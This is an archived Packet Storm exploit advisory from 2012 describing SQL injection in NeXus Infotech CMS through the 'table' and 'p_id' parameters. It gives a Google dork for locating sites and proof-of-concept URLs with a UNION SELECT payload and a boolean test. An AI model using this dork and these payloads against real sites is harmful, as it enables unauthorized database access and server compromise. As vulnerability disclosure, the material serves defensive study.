NeXus Infotech CMS SQL Injection

2012-05-07T00:00:00
ID PACKETSTORM:112498
Type packetstorm
Reporter gr00ve_hack3r
Modified 2012-05-07T00:00:00

Description

                                        
                                            `# Exploit title : NeXus Infotech CMS SQL Injection Vulnerability  
# Date : May 05,2012  
# Author : gr00ve_hack3r  
# Contact : groove.hacker7/a/t/gmail.com  
# Homepage : www.gr00ve-hack3r.com  
# Vendor : NeXus Infotech  
# Vendor Site : http://www.nexusinfotech.org/  
# Google Dork : intext:"Powered By NeXus Infotech"  
  
# Vulnerability :  
  
GET parameter " table " and " p_id " accept unsanitised user input and  
result in SQL injection which can lead to server compromise  
  
# PoC Exploit :  
  
[+] http://[host].com/index.php?pagename=photogallery&table=photogallery  
UNION ALL SELECT 1, 1, CONCAT(CHAR(1),CHAR(1),CHAR(1))#  
[+] http://www.[host].com/details.asp?p_id=1 AND 2=2  
`